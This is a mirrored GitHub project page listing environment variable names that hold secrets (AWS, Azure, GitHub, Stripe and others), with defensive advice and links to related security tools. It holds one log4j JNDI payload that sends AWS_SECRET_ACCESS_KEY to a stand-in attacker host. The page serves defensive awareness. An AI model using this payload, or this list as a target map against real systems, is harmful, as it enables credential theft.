All Projects → Puliczek → awesome-list-of-secrets-in-environment-variables

Puliczek / awesome-list-of-secrets-in-environment-variables

Licence: other
🦄🔒 Awesome list of secrets in environment variables 🖥️

Projects that are alternatives of or similar to awesome-list-of-secrets-in-environment-variables

CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Stars: ✭ 760 (+41.26%)
Mutual labels:  exploit, log4j, cybersecurity, poc, writeups, bugbounty, red-team, security-writeups, cve-2021-44228, bugbounttips
Bigbountyrecon
BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation.
Stars: ✭ 541 (+0.56%)
Mutual labels:  cybersecurity, pentesting, bugbounty, red-team
Defaultcreds Cheat Sheet
One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
Stars: ✭ 1,949 (+262.27%)
Mutual labels:  exploit, cybersecurity, pentesting, bugbounty
Red-Team-Essentials
This repo will contain some basic pentest/RT commands.
Stars: ✭ 22 (-95.91%)
Mutual labels:  cybersecurity, pentesting, red-team
linux-rootkits-red-blue-teams
Linux Rootkits (4.x Kernel)
Stars: ✭ 56 (-89.59%)
Mutual labels:  pentesting, red-team, blue-team
Bulwark
An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.
Stars: ✭ 113 (-79%)
Mutual labels:  pentesting, bugbounty, red-team
ShonyDanza
A customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.
Stars: ✭ 86 (-84.01%)
Mutual labels:  pentesting, red-team, blue-team
Pentesting
Misc. Public Reports of Penetration Testing and Security Audits.
Stars: ✭ 24 (-95.54%)
Mutual labels:  exploit, poc, bugbounty
Hack Tools
The all-in-one Red Team extension for Web Pentester 🛠
Stars: ✭ 2,750 (+411.15%)
Mutual labels:  cybersecurity, pentesting, red-team
tryhackme-ctf
TryHackMe CTFs writeups, notes, drafts, scrabbles, files and solutions.
Stars: ✭ 140 (-73.98%)
Mutual labels:  exploit, cybersecurity, writeups
A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (-29%)
Mutual labels:  exploit, cybersecurity, pentesting
YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-93.49%)
Mutual labels:  exploit, pentesting, bugbounty
Thecollective
The Collective. A repo for a collection of red-team projects found mostly on Github.
Stars: ✭ 85 (-84.2%)
Mutual labels:  cybersecurity, pentesting, red-team
log4j-detector
Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!
Stars: ✭ 622 (+15.61%)
Mutual labels:  log4j, cybersecurity, cve-2021-44228
github-watchman
Monitoring GitHub for sensitive data shared publicly
Stars: ✭ 60 (-88.85%)
Mutual labels:  cybersecurity, red-team, blue-team
dorothy
Dorothy is a tool to test security monitoring and detection for Okta environments
Stars: ✭ 85 (-84.2%)
Mutual labels:  cybersecurity, red-team, blue-team
log4j-scanner
log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
Stars: ✭ 1,212 (+125.28%)
Mutual labels:  log4j, cve-2021-44228
HolyTips
A Collection of Notes, Checklists, Writeups on Bug Bounty Hunting and Web Application Security.
Stars: ✭ 1,210 (+124.91%)
Mutual labels:  writeups, bugbounty
targets
A collection of over 5.1 million sub-domains and assets belonging to public bug bounty programs, compiled into a repo, for performing bulk operations.
Stars: ✭ 85 (-84.2%)
Mutual labels:  cybersecurity, bugbounty
Galaxy-Bugbounty-Checklist
Tips and Tutorials for Bug Bounty and also Penetration Tests.
Stars: ✭ 34 (-93.68%)
Mutual labels:  bugbounty, red-team
🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on

Awesome list of secrets in environment variables Awesome

📝 Description

List of secrets, passwords, API keys, tokens stored inside a system environment variables.

An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.

Many developer documentations recommends storing secrets inside an environment variable, but is it the best way to keep secrets?

The attacker can read values inside system environment variable by using exploits:

  • CVE-2021-44228 JNDI log4j (JAVA) (Read more...)

    ${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}

    Get AWS_SECRET_ACCESS_KEY or return NO_EXISTS

  • CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on Github and Twitter 😉

  • and much more...

Because of that I created, a list of secrets in environment variables to help secure software.

Some of practices to avoid leak of secrets stored in environment variables is to:

  • Block/notify on WAF when the request includes system environment variables
  • Store in system environment variable path to a config file, instead of clean value
  • Encrypt values inside environment variable
  • Use different way to store secrets 🤓

Environment variables

You can check your system environment variables:

  • Windows execute in PowerShell: dir env:
  • Linux/MacOS execute in terminal: printenv or env

Awesome list of secrets in environment variables

A

AWS

  • AWS_ACCESS_KEY_ID
  • AWS_SECRET_ACCESS_KEY
  • AMAZON_AWS_ACCESS_KEY_ID
  • AMAZON_AWS_SECRET_ACCESS_KEY

source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html

Azure

  • AZURE_CLIENT_ID
  • AZURE_CLIENT_SECRET
  • AZURE_USERNAME
  • AZURE_PASSWORD
  • MSI_ENDPOINT
  • MSI_SECRET

source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406

B

Binance

  • binance_api
  • binance_secret

source: https://algotrading101.com/learn/binance-python-api-guide/

Bittrex

  • BITTREX_API_KEY
  • BITTREX_API_SECRET

source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md

C

CircleCI

  • CIRCLE_TOKEN

source: https://circleci.com/docs/2.0/api-developers-guide/

D

Digitalocean

  • DIGITALOCEAN_ACCESS_TOKEN

source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean

Dockerhub

  • DOCKERHUB_PASSWORD

source: https://circleci.com/docs/2.0/env-vars/

E

F

Fastlane products

  • ITC_PASSWORD

source: https://github.com/phatblat/fastlane-variables

Facebook

  • FACEBOOK_APP_ID
  • FACEBOOK_APP_SECRET
  • FACEBOOK_ACCESS_TOKEN

G

Github

  • GH_TOKEN
  • GITHUB_TOKEN
  • GH_ENTERPRISE_TOKEN
  • GITHUB_ENTERPRISE_TOKEN

source: https://cli.github.com/manual/gh_help_environment

Google Cloud

  • GOOGLE_APPLICATION_CREDENTIALS
  • GOOGLE_API_KEY

source: https://cloud.google.com/docs/authentication/getting-started#windows

Gitlab

  • CI_DEPLOY_USER
  • CI_DEPLOY_PASSWORD
  • GITLAB_USER_LOGIN
  • CI_JOB_JWT
  • CI_JOB_JWT_V2
  • CI_JOB_TOKEN

source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html

H

I

J

K

L

M

Mailgun

  • MAILGUN_API_KEY

source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/

MongoDB

  • MCLI_PRIVATE_API_KEY
  • MCLI_PUBLIC_API_KEY

https://docs.mongodb.com/mongocli/stable/configure/environment-variables/

N

NPM

  • NPM_TOKEN

source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow

O

OpenStack command-line client

  • OS_PASSWORD

source: https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html

P

Percy.io

  • PERCY_TOKEN

source: https://docs.percy.io/docs/environment-variables

Q

R

S

Sentry

  • SENTRY_AUTH_TOKEN

source: https://docs.sentry.io/product/cli/configuration/

Slack

  • SLACK_TOKEN

source: https://slack.dev/node-slack-sdk/getting-started

Square

  • square_access_token
  • square_oauth_secret

source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme

Stripe

  • STRIPE_API_KEY
  • STRIPE_DEVICE_NAME

source: https://stripe.com/docs/cli/api_keys

T

Twilio

  • TWILIO_ACCOUNT_SID
  • TWILIO_AUTH_TOKEN

Source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html

Twitter

  • CONSUMER_KEY
  • CONSUMER_SECRET

source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices

Travis Ci

  • TRAVIS_SUDO
  • TRAVIS_OS_NAME
  • TRAVIS_SECURE_ENV_VARS

source: https://docs.travis-ci.com/user/environment-variables

U

V

Vault HashiCorp

  • VAULT_TOKEN
  • VAULT_CLIENT_KEY

source: https://www.vaultproject.io/docs/commands

Vultr

  • TOKEN
  • VULTR_ACCESS
  • VULTR_SECRET

source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops

W

X

Y

Z

Get a RAW list:

The repository includes the raw list:

raw_list.txt

It is auto-generated from README.md by GitHub action.

😎 Contributing

👍🎉 First off, thanks for taking the time to contribute! 🎉👍

If you would like to add more secrets:
Please read and follow our Contributing guide

Thanks! 🦄

💻 Useful links

🤝 Show your support

🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on

✔️ Disclaimer

This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].